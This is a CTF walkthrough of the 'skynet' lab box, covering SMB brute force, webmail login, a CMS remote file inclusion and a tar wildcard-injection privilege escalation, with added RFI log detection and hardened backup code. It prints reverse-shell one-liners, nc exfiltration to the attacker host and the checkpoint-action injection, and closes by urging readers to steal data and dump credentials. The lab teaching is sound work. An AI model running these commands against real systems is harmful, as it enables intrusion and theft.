NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play a CTF called skynet at
This room starts to move away from the guided path and has far fewer flags, but it retains more than just a two-task approach to keep the person thinking about the types of vulnerability. I’m thinking it might be cool to ask defensive questions as well (something I might add into my room I’m building).
Well, we don’t have time to waste; the machines might rise up and Judgement Day might occur, so let’s get pwning!
We start off with a full tcp scan as shown:
nmap -sS -O -sV -sC -A -T4 -Pn -p- -vvv -oA skynet 10.10.206.187
We find a range of common services on this IP:
- HTTP (80)
There are things we start to notice straight off the bat! This server is leaking a lot of intel!
- Username disclosed (milesdyson)
- Weak password policy
- Susceptible to brute force (no account lockout)
Well SMB is exposed so we start hitting this with a brute force attack! It’s not impossible to get a hit but whilst this is running, we can go and explore other areas. I’ve used msf but you could easily use hydra or nmap to perform this attack (or write a custom script if that makes you happy!)
smbclient -L 10.10.206.187
Now we also noticed an anonymous-access share:
Let’s explore that!
Using smbget we found a log file that looks like it contains a list of passwords.
We poke about here for a while; the books seem like rabbit holes!
When multiple services are exposed it’s important to leave no stone unturned! You never know what service might contain a vulnerability that can be exploited and until you try you won’t know!
We run a whole range of web discovery, including forced browsing using dirbuster (again, you could use Burp Pro content discovery, gobuster or other tools!)
I used dirbuster on the HTTP Service on TCP 80 and found a webmail login
Now we know we have a username and we found what looks like a list of passwords! Using Burp I ran an intruder attack to identify the following credentials:
Hacker Voice: “I’m in”
In the email we search around and discover that we have the following:
A password reset email that sends credentials in an insecure manner! Easy money (haha, I couldn’t write this without some T2 quotes in!)
SMB I’ll be back
A likely target for these creds is the home folder we found earlier, again I use msf but you could use the other tools (smbclient etc.)! We run an SMB Login check
SMB USER: milesdyson
Now we have SMB Creds
We can see the creds are valid!
Now let’s see what secrets we can find in the home folder!
smbclient -L 10.10.206.187 -U SKYNET/milesdyson
smbclient //10.10.206.187/milesdyson -U "milesdyson"
smbget smb://10.10.206.187/milesdyson -U "milesdyson" -R
In the files there is an important.txt
It leaks a CMS directory path
Using Google, we find that there is an RFI vulnerability in this CMS.
Browse to this path then base64 decode
Since this is an RFI we can host a webshell and get the server to connect to us and spawn a shell.
For this we will need:
- An http listener (python)
- A php reverse shell
- A netcat listener
Copy a php reverse shell and edit the params (IP and PORT)
So, here’s our listener
And finally our python http server
Now we need to build our RFI payload:
Now we have the user flag!
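From the defender’s side, the RFI step above leaves a clear trace in the web server’s access log: a query-string value that is itself a URL. The following shell snippet is an added example (not from the original post) that triages access-log lines for that pattern; the paths, parameter names and log lines are constructed, and only the attacker address comes from the walkthrough.

```shell
#!/bin/sh
# Added detection example: flag remote file inclusion attempts in an
# Apache-style access log. An RFI attempt hands the vulnerable parameter a
# remote URL, so the tell-tale is a query-string value that begins with a
# scheme, either raw ("http://") or percent-encoded ("http%3A%2F%2F").
# Paths and parameter names below are constructed, not the room's CMS.

# Constructed log lines: the first and third are RFI attempts (the first
# pulls a shell from the attacker host used in the walkthrough), the
# second is an ordinary page request that must not be flagged.
SAMPLE_LOG='10.8.20.85 - - [28/Jan/2020:10:00:01 +0000] "GET /cms/admin/config.php?urlConfig=http://10.8.20.85/shell.txt HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.8.20.85 - - [28/Jan/2020:10:00:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.8.20.85 - - [28/Jan/2020:10:00:03 +0000] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# ERE: request line whose query string has a value starting with a scheme.
# Used case-insensitively so HTTP:// and %3a%2f%2f are caught as well.
# This is a triage heuristic; legitimate redirect parameters can match too.
RFI_PATTERN='"(GET|POST) [^"]*\?[^"]*=[^"&]*(https?|ftp)(://|%3A%2F%2F)'

# Filter: print only the suspicious lines read from stdin.
flag_rfi_requests() {
    grep -iE "$RFI_PATTERN"
}

# Count suspicious lines in the log text passed as $1 (prints 0 when none).
count_rfi_requests() {
    printf '%s\n' "$1" | grep -ciE "$RFI_PATTERN" || true
}

# Unique client addresses behind the hits, for alerting or blocklisting.
rfi_source_ips() {
    flag_rfi_requests | cut -d' ' -f1 | sort -u
}

# Stand-alone run: show the flagged lines from the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | flag_rfi_requests
```

Feed a real log with `flag_rfi_requests < /var/log/apache2/access.log`; confirming the CMS has `allow_url_include` disabled removes the class of bug these hits point at.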
Let’s upgrade our shell using python
python -c 'import pty; pty.spawn("/bin/bash")'
On our attacker machine let’s get some enumeration tools:
On the target:
cd /tmp
wget http://10.8.20.85:80/LinEnum.sh
Now make this executable
chmod +x LinEnum.sh
A scheduled task too far
There is a root cron job which affects the userland file system (/home/milesdyson/backups)
Let’s send the enum output to the attacker:
Set up a nc listener on the attacker and write whatever arrives to a file:
nc -l -p 999 -q 1 > linenum.txt < /dev/null
Send the file from the target:
cat enum.txt-28-01-20 | nc 10.8.20.85 999
Setup a listener
nc -nlvp 1337
Spawn a bash shell back to the attacker:
nc -e /bin/sh 10.8.20.85 1337
Now the backup script has the following:
tar cf /home/milesdyson/backups/backup.tgz *
This script is vulnerable to wildcard injection: the shell expands * into filenames that tar then parses as if they were arguments!
On the victim:
cd /var/www/html
echo "rm /tmp/r;mkfifo /tmp/r;cat /tmp/r|/bin/sh -i 2>&1|nc 10.8.20.85 1337 >/tmp/r" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
chmod +x shell.sh
chmod 777 html
And we have the root flag! After you finish your r00t dance remember to explore the target, steal anything of use and dump creds etc.
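The root cron job above is the classic tar wildcard problem: the shell, not tar, expands `*`, so a planted filename becomes a tar option. The snippet below is an added example (not the room’s backup script) showing how the same backup is written so that filenames can never be parsed as options, plus a pre-flight audit that turns a planted name into an alert. It assumes GNU or BSD find (for -mindepth/-maxdepth) and a tar that honours `--`; the real fix also includes not having root archive a directory an unprivileged user can write to.

```shell
#!/bin/sh
# Hardened stand-in for "tar cf backup.tgz *" (added example, not the
# room's script). Two defences:
#   1. enumerate inside tar ("-C dir -- .") instead of letting the shell
#      expand "*" into argv, so a file named "--checkpoint-action=..."
#      is archived as data and never parsed as an option;
#   2. audit the source directory for option-looking names first, since
#      such names only appear when someone is attempting the attack.
# Assumes GNU/BSD find (-mindepth/-maxdepth) and a tar that honours "--".

# List top-level entries of $1 whose names start with "-".
# Returns 1 (and prints the names to stderr) if any exist, 0 otherwise.
find_option_like_names() {
    dir="$1"
    found=$(find "$dir" -mindepth 1 -maxdepth 1 -name '-*' -print)
    if [ -n "$found" ]; then
        printf 'option-like filename(s) in %s:\n%s\n' "$dir" "$found" >&2
        return 1
    fi
    return 0
}

# Archive $1 into $2 without a glob. "--" ends option parsing and "."
# makes tar walk the directory itself, so entry names are data only.
safe_backup() {
    src="$1"
    dest="$2"
    tar -cf "$dest" -C "$src" -- .
}

# Cron-style wrapper: refuse to run when the audit fails, so a planted
# filename becomes an alert in the cron mail rather than a root shell.
backup_or_alert() {
    src="$1"
    dest="$2"
    if ! find_option_like_names "$src"; then
        printf 'backup of %s aborted: investigate the names above\n' "$src" >&2
        return 2
    fi
    safe_backup "$src" "$dest"
}
```

Dropping `backup_or_alert /var/www/html /home/milesdyson/backups/backup.tgz` into the cron entry in place of the original line keeps the backup working while the exploit file is reduced to an odd filename in the archive.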
This box was a nice path and shows off a range of vulnerabilities:
- Sensitive Information Disclosure
  - Weak Credential Storage
  - Passwords in anonymous share
- Weak Authentication
  - Lack of account lockout policy and weak password requirements
- Vulnerable Software
  - Vulnerable Unpatched CMS
- Insecure Configuration
  - CRON jobs running as root using userland writeable assets
I like the mixture of guided and unguided rooms, it provides opportunities to showcase techniques and helps people learn whilst providing a safe space for people to explore.